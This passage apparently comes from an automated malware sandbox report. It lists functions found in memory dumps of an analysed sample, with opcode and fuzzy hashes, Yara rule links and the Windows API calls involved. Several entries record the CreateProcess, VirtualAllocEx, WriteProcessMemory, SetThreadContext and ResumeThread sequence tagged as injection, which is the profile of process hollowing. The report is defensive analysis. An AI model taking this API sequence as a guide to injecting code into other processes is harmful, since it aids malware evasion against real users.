                                                                                                • Instruction ID: e75612658fed3559c7f064b2a6842c0f1165996be1cb7f56b401e7765eb16230
                                                                                                • Opcode Fuzzy Hash: 2bebb976c3d7efb93eb892e74072ecf8c3848c4adadbe3041c853ad81d1aba4d
                                                                                                • Instruction Fuzzy Hash: DA11CE78A00628CFDB20CFA4DC88B99BBB2BB48301F1085DAD549A7250D7749EC5CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740915, Relevance: 2.5, Strings: 2, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: 4c645ead40784a04740d2557f276261cb2df12ddae145cd4b334c2ca6d3658e5
                                                                                                • Instruction ID: e29e6b348eeb5bc33211d4c18f4092f4ddf9cdae24c261a703bdae4381edc2f5
                                                                                                • Opcode Fuzzy Hash: 4c645ead40784a04740d2557f276261cb2df12ddae145cd4b334c2ca6d3658e5
                                                                                                • Instruction Fuzzy Hash: 36119078A00628CFDB20CF64DD88B99BBB1BB49301F1080DAD949A7251D7749EC5CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0074052D, Relevance: 2.5, Strings: 2, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: a42db3b496240e20def73158d0cc92e73d562d6142c381868cf6d12257b2fd7e
                                                                                                • Instruction ID: 04810c311e9af02ca05c8b59c6bb8a3a09efbe6594f73dcf90601e29796deff6
                                                                                                • Opcode Fuzzy Hash: a42db3b496240e20def73158d0cc92e73d562d6142c381868cf6d12257b2fd7e
                                                                                                • Instruction Fuzzy Hash: 0111B0B8A11628CFDB20CFA4DC88B9ABBF1AB45305F2484D9D548A7251D7788EC8CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0074068D, Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: 335e351584a4f359701253c25d76011207c9c8af3072e6c7e779b5ff178d29b1
                                                                                                • Instruction ID: 98e7818dcd3b0a335922d6e5f919fc5b74d05d8a61b061e18844cdd2d0672be8
                                                                                                • Opcode Fuzzy Hash: 335e351584a4f359701253c25d76011207c9c8af3072e6c7e779b5ff178d29b1
                                                                                                • Instruction Fuzzy Hash: E4112578A05B688FDB20CF60DC98B99BBB1BF46301F2485DAD548A3291D7748EC8CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007403B7, Relevance: 2.5, Strings: 2, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: 0e0579c06fc164edb02d2d75230cdf4554c27da51200dbd8c146d0795a2ab488
                                                                                                • Instruction ID: c1a3332a362adbb8a44a296454335c93d99ae23423fb1399a29f4b8277495404
                                                                                                • Opcode Fuzzy Hash: 0e0579c06fc164edb02d2d75230cdf4554c27da51200dbd8c146d0795a2ab488
                                                                                                • Instruction Fuzzy Hash: 5B01E278A00628CFDB20CF64CC88BA9BBB2BB49301F2080EAD548A3251D7748EC4CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0074042F, Relevance: 2.5, Strings: 2, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: 95d7506da6032a0b7a20bf0cfe3c1fd258c7b5fa69ee7de00a8d5174ccd75337
                                                                                                • Instruction ID: e4dce5d8811edee8a3fc330bfa69c0cbaa091b3ec7c78ed9ab0c8e14f9d037f4
                                                                                                • Opcode Fuzzy Hash: 95d7506da6032a0b7a20bf0cfe3c1fd258c7b5fa69ee7de00a8d5174ccd75337
                                                                                                • Instruction Fuzzy Hash: EC01A278A10728CFDB20CF64DC88B99BBB2BB59301F2484DAD548A7251D7748EC4DF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00740A64, Relevance: 2.5, Strings: 2, Instructions: 34COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: %$.
                                                                                                • API String ID: 0-3975786864
                                                                                                • Opcode ID: ceeec1eeeefab17a506d940ab6bef408795f313be1813ef9a5055b24234a5c14
                                                                                                • Instruction ID: dc857d65ea20211f0ac5ced8fe72820ee4db0fd6f587da822fcca1a119ba8f9c
                                                                                                • Opcode Fuzzy Hash: ceeec1eeeefab17a506d940ab6bef408795f313be1813ef9a5055b24234a5c14
                                                                                                • Instruction Fuzzy Hash: E0010478A01628CFDB20CF64DC88BA9BBB1BF55302F1480DAD548A7251D7748EC4CF45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DEB1D, Relevance: 1.8, APIs: 1, Instructions: 324processCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001DEDEF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 71913890896f48540a9329da3801dc099dfb20f285000d9dc64505eb30df4741
                                                                                                • Instruction ID: 6c3ffb4970bb7648aac79d85a8c4aaa3e02d6486a6d7d9fc17c41399f144a279
                                                                                                • Opcode Fuzzy Hash: 71913890896f48540a9329da3801dc099dfb20f285000d9dc64505eb30df4741
                                                                                                • Instruction Fuzzy Hash: CEC12471D002698FDF20DFA4C841BEEBBB1BF49304F1095AAE859B7240DB749A85CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DEB28, Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001DEDEF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 3cfb6b6311c27504db7f9bfe928ab796f79a3b733e69a08083d08cdfb392d96f
                                                                                                • Instruction ID: d458013ad1f80f5bc28d22e3578c3678b17a2635779c9fd0c6c5ce387707e664
                                                                                                • Opcode Fuzzy Hash: 3cfb6b6311c27504db7f9bfe928ab796f79a3b733e69a08083d08cdfb392d96f
                                                                                                • Instruction Fuzzy Hash: 0CC12471D002698FDF20DFA4C841BEEBBB1BF49304F1095AAE859B7240DB749A85CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DE798, Relevance: 1.6, APIs: 1, Instructions: 119injectionCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DE873
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: b06ef9ddbe4086c5ed8db9dc7796b180844498cb58d3bcb33c78bc1fc47c8f78
                                                                                                • Instruction ID: e4efb2c61821aa3ba8472e22e1864c47af52416dd32b706f2d07647d483a378c
                                                                                                • Opcode Fuzzy Hash: b06ef9ddbe4086c5ed8db9dc7796b180844498cb58d3bcb33c78bc1fc47c8f78
                                                                                                • Instruction Fuzzy Hash: DF41ACB5D012589FCF00CFA9D984AEEFBF1BF49314F24942AE814B7210D778AA45CB54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DE7A0, Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DE873
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3559483778-0
                                                                                                • Opcode ID: c10f4483c4af57e73cc89bea31a3608fa0d56ac056df4d1e713d027c501b7f09
                                                                                                • Instruction ID: 59400b72975ec153b1923a5f2d1eb8236a8616c8fb52c25ebce728dec5923e85
                                                                                                • Opcode Fuzzy Hash: c10f4483c4af57e73cc89bea31a3608fa0d56ac056df4d1e713d027c501b7f09
                                                                                                • Instruction Fuzzy Hash: B2419AB5D012589FCF00CFA9D984AEEFBF1BB49314F24942AE815B7200D774AA45CF64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DE8F0, Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DE9AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead
                                                                                                • String ID:
                                                                                                • API String ID: 1726664587-0
                                                                                                • Opcode ID: fb1c04d959f242bd312ee1a1d41acca1d318f69dc2e76d34b8e51c8d722cb3fd
                                                                                                • Instruction ID: a32259b7e154ce2a57837a04e894f52e04e92990c146ae43729522f8a81aface
                                                                                                • Opcode Fuzzy Hash: fb1c04d959f242bd312ee1a1d41acca1d318f69dc2e76d34b8e51c8d722cb3fd
                                                                                                • Instruction Fuzzy Hash: A44198B9D042589FCF10CFA9D884AEEFBB1BB49314F14942AE815B7210D735AA45CF64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DE8F8, Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001DE9AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: MemoryProcessRead
                                                                                                • String ID:
                                                                                                • API String ID: 1726664587-0
                                                                                                • Opcode ID: 813236f7690436c5be11a528abf92ada22a6a824c6dea7b8e8965891837c190b
                                                                                                • Instruction ID: 3ff1bc9f6baaae847e1de4b766611e2b862b0f9147990cb450d509cba0f2e06b
                                                                                                • Opcode Fuzzy Hash: 813236f7690436c5be11a528abf92ada22a6a824c6dea7b8e8965891837c190b
                                                                                                • Instruction Fuzzy Hash: C541A9B5D042589FCF10CFAAD884AEEFBB5BF49314F14942AE815B7200D735A945CF64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DE678, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001DE72A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: f60064b38aff68763fd1af11b64ed571aa0eeeacf046a54d587f77165e45151e
                                                                                                • Instruction ID: 2f7626b47522eaae5f16ae6f2068413983a7a4dcf76357d9d75f134df8e04033
                                                                                                • Opcode Fuzzy Hash: f60064b38aff68763fd1af11b64ed571aa0eeeacf046a54d587f77165e45151e
                                                                                                • Instruction Fuzzy Hash: DF3178B9D042589FCF10CFA9D884ADEFBB5BB49310F14A42AE815BB310D735A905CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DE680, Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001DE72A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: 7f600c29f62d1da6b37e98ef81cd83ec336320b5fd8fefb03486bde93e70ac8f
                                                                                                • Instruction ID: c06aa2953e6449499a26889ad2b347a1fce5762c913971084940d87e15d3372c
                                                                                                • Opcode Fuzzy Hash: 7f600c29f62d1da6b37e98ef81cd83ec336320b5fd8fefb03486bde93e70ac8f
                                                                                                • Instruction Fuzzy Hash: C83189B9D042589FCF10CFA9D884ADEFBB5BB49310F14A42AE815B7310D735A905CF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DE550, Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 001DE607
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: 4bcf11b2c2b6958403a65feb8ce62c72a6d7797bccc23af5f3328c8c4d43025a
                                                                                                • Instruction ID: c55474dcf753686b952b6c01bdac603b3acc3a51249d09266ef1d0beb16e4bac
                                                                                                • Opcode Fuzzy Hash: 4bcf11b2c2b6958403a65feb8ce62c72a6d7797bccc23af5f3328c8c4d43025a
                                                                                                • Instruction Fuzzy Hash: 2241ACB5D012589FDF10DFA9D884AEEBBF1BF49314F24842AE414B7240D778A945CF64
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DE558, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 001DE607
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: ContextThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 983334009-0
                                                                                                • Opcode ID: d33c4c4584e0e2346f133421813a7ff588e25ad2b6b09772160bba39a3ccc2f8
                                                                                                • Instruction ID: 56aed5de6a73065dd3bd15a4d6b518ee0f071188a8f9b0aefac7bc66ff094c3e
                                                                                                • Opcode Fuzzy Hash: d33c4c4584e0e2346f133421813a7ff588e25ad2b6b09772160bba39a3ccc2f8
                                                                                                • Instruction Fuzzy Hash: 1731ABB4D012589FCB10DFAAD884AEEBBF1AB49314F24842AE418B7240D778A945CF54
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DE460, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ResumeThread.KERNELBASE(?), ref: 001DE4E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 35c4b3bc5ca18faa927baf9bc2ce6107b0f1384511d11d11bdca8b213e634b7f
                                                                                                • Instruction ID: bb23ea7898ce23900e6923d3418eb48a5febddede0a1eaa62dc75c2f4c52ddc1
                                                                                                • Opcode Fuzzy Hash: 35c4b3bc5ca18faa927baf9bc2ce6107b0f1384511d11d11bdca8b213e634b7f
                                                                                                • Instruction Fuzzy Hash: C131A9B4D052189FCF14CFA9E884AEEBBB5AF49314F24942AE815B7300D774A941CF94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001DE468, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • ResumeThread.KERNELBASE(?), ref: 001DE4E6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID: ResumeThread
                                                                                                • String ID:
                                                                                                • API String ID: 947044025-0
                                                                                                • Opcode ID: 1b6b351df6afec86b8781524fa4067d075db267f8c4ab25926aee76801d2c7ba
                                                                                                • Instruction ID: 8b973ef3d347e3e8e2ab55c9efe659be8c30ad671c16aaa1000b0ae2ad4d8ce6
                                                                                                • Opcode Fuzzy Hash: 1b6b351df6afec86b8781524fa4067d075db267f8c4ab25926aee76801d2c7ba
                                                                                                • Instruction Fuzzy Hash: F83179B5D052189BCF14CFA9E884AEEFBB5AB49314F24942AE815B7300D775A901CFA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0017D01C, Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164312324.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 20f0b5241cf32b7fa44c3f5ca33087959f6afde0cb9a9140a4d62ef3f18a2404
                                                                                                • Instruction ID: e098f5f6ceace8e81152abb9de1fcf7b75376622a3d4818923814ae1606076c0
                                                                                                • Opcode Fuzzy Hash: 20f0b5241cf32b7fa44c3f5ca33087959f6afde0cb9a9140a4d62ef3f18a2404
                                                                                                • Instruction Fuzzy Hash: F221B075604248DFDB14DF64E984B26BBB5EF84314F24C9ADE80D4B246C336D847CAA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0017D006, Relevance: .1, Instructions: 62COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164312324.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: fdcc8860de0e16a36dba1968ee874b50fab185b575034306609bb5c7784c0120
                                                                                                • Instruction ID: 36e9d6320ed2756ffae4243b3eac04fb20ab8c1fae6cceb9bf687b6f5e1f10d6
                                                                                                • Opcode Fuzzy Hash: fdcc8860de0e16a36dba1968ee874b50fab185b575034306609bb5c7784c0120
                                                                                                • Instruction Fuzzy Hash: CF218B755093848FCB12CF20D994B15BF71EF46314F28C5EAD8498B6A7C33A980ACB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 007413F0, Relevance: .0, Instructions: 36COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c3ce6ccc0efc4c2d63fe2ea3c43fbf1be8aac817c46f7826494b1ae0c03eaf50
                                                                                                • Instruction ID: c2d67114e5c17187e79bb83be69a882de25ea6204cf1792d7bcc96589c071896
                                                                                                • Opcode Fuzzy Hash: c3ce6ccc0efc4c2d63fe2ea3c43fbf1be8aac817c46f7826494b1ae0c03eaf50
                                                                                                • Instruction Fuzzy Hash: EDF03C30904288EFCB05DF98D8049A8BFB0EF4A310F54859AD84597262C3365A91EF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00741400, Relevance: .0, Instructions: 24COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: c5be0eea23dcc48a83cc7b53a0528dadbebe50d4561ebe7efca8bd603487871e
                                                                                                • Instruction ID: e9b8f848f9f2b08923438205d738b73a92ad9caf77dec162b3e839753ed64f09
                                                                                                • Opcode Fuzzy Hash: c5be0eea23dcc48a83cc7b53a0528dadbebe50d4561ebe7efca8bd603487871e
                                                                                                • Instruction Fuzzy Hash: DAF0153490020CEFCB00DFD8D9449ACBBB5EB48300F20C1A9EC1853351C7329A61EF41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00741098, Relevance: .0, Instructions: 22COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 8afa2163a7cf107f734ac6cdb672095e906d95891858d38ae4c4a6a0e625fe67
                                                                                                • Instruction ID: bc2ac80b93b4f8b2bb818e7c1887f7011985294262ff38faeb649be20ad76439
                                                                                                • Opcode Fuzzy Hash: 8afa2163a7cf107f734ac6cdb672095e906d95891858d38ae4c4a6a0e625fe67
                                                                                                • Instruction Fuzzy Hash: 8AF05FB99092299FCB60DF64D89C6CDBBF5BF08301F1055E6D409A7220EB355B85DF80
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00741538, Relevance: .0, Instructions: 21COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 5698aa9191e9b751788e0d30b8a2ee3a8f14a3363f1ee5b4baa1113a4b89f5b8
                                                                                                • Instruction ID: ab250d98dfdd7d42cda975846564967db59b97a58ab4ccd4f929b7aabe887959
                                                                                                • Opcode Fuzzy Hash: 5698aa9191e9b751788e0d30b8a2ee3a8f14a3363f1ee5b4baa1113a4b89f5b8
                                                                                                • Instruction Fuzzy Hash: D5E0E574D04208EFCB04DFA8D5546ACFBB8AB88301F1081AAE84953341D7359B91EB81
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00741588, Relevance: .0, Instructions: 20COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164527174.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9b4b35843253928b6968afed29340e72e8e4e01185e4681ca32d7f64e6521451
                                                                                                • Instruction ID: 8307feeaeeddeb4931f91ad5cc725f8ea2b6d88cf278c870e205419dcdc45ff6
                                                                                                • Opcode Fuzzy Hash: 9b4b35843253928b6968afed29340e72e8e4e01185e4681ca32d7f64e6521451
                                                                                                • Instruction Fuzzy Hash: 19E09A74D45208EFC704DFD8D5455ACF7B8EB88705F6081ADD80957341D7359E51DB41
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 001D2A88, Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: TVGm
                                                                                                • API String ID: 0-2166477260
                                                                                                • Opcode ID: ca456fb0ae1f00d2e7aa8e73e975b6bd0004e6d6511fabc0ea76e8c74736e899
                                                                                                • Instruction ID: 9993218ff4ca6cb9e4a1b22d9100aeb4b898e22e292f9984a5c825dec20135fe
                                                                                                • Opcode Fuzzy Hash: ca456fb0ae1f00d2e7aa8e73e975b6bd0004e6d6511fabc0ea76e8c74736e899
                                                                                                • Instruction Fuzzy Hash: 33B17275E006588FDB68DF6AC944ADDBBF2AF89301F14C0AAD409AB365DB305E85CF50
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001D2737, Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @2Gm
                                                                                                • API String ID: 0-293892856
                                                                                                • Opcode ID: 6f6ec2ee394bab0e8bde3e9c304902b6ee8dc5e9e8383db5108709ad0babe65a
                                                                                                • Instruction ID: 108c1f850490c7600719b015b4a5d5feb028c0fcbe8736e0dbcd4968c061bd38
                                                                                                • Opcode Fuzzy Hash: 6f6ec2ee394bab0e8bde3e9c304902b6ee8dc5e9e8383db5108709ad0babe65a
                                                                                                • Instruction Fuzzy Hash: 70713F749002088FDB48EFBAD940ADDBBF3AB88304F04C539D4199B678DFB0598ADB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001D2748, Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @2Gm
                                                                                                • API String ID: 0-293892856
                                                                                                • Opcode ID: bb86a38318107126d70633f9e03780569909b7b2c8c816302fc9e402d7fc4b41
                                                                                                • Instruction ID: 123d0f97eeef0ed0018935d8ed89c4217852891496b0ff88808c24f1c7e0f7c7
                                                                                                • Opcode Fuzzy Hash: bb86a38318107126d70633f9e03780569909b7b2c8c816302fc9e402d7fc4b41
                                                                                                • Instruction Fuzzy Hash: 98611E749002088FDB48EFBAD951A9DBBF3ABC8304F04C539D4199B678DFB0598ADB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001D75B8, Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @2Gm
                                                                                                • API String ID: 0-293892856
                                                                                                • Opcode ID: 9952820b2570328bcffc4ae94054bd16efdcb1b65313879bbec090d9d04bf54d
                                                                                                • Instruction ID: 27d33c871d89f8f8ae844062aecde034d46206b345d962fa155c7107306abe48
                                                                                                • Opcode Fuzzy Hash: 9952820b2570328bcffc4ae94054bd16efdcb1b65313879bbec090d9d04bf54d
                                                                                                • Instruction Fuzzy Hash: 3B5173749142088FDB44FFB9E844ADE7BF3AF88304F14C979D005AB264DB70690ADB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 001D75C8, Relevance: 1.4, Strings: 1, Instructions: 145COMMON
                                                                                                Download Yara Rule
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2164330079.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: @2Gm
                                                                                                • API String ID: 0-293892856
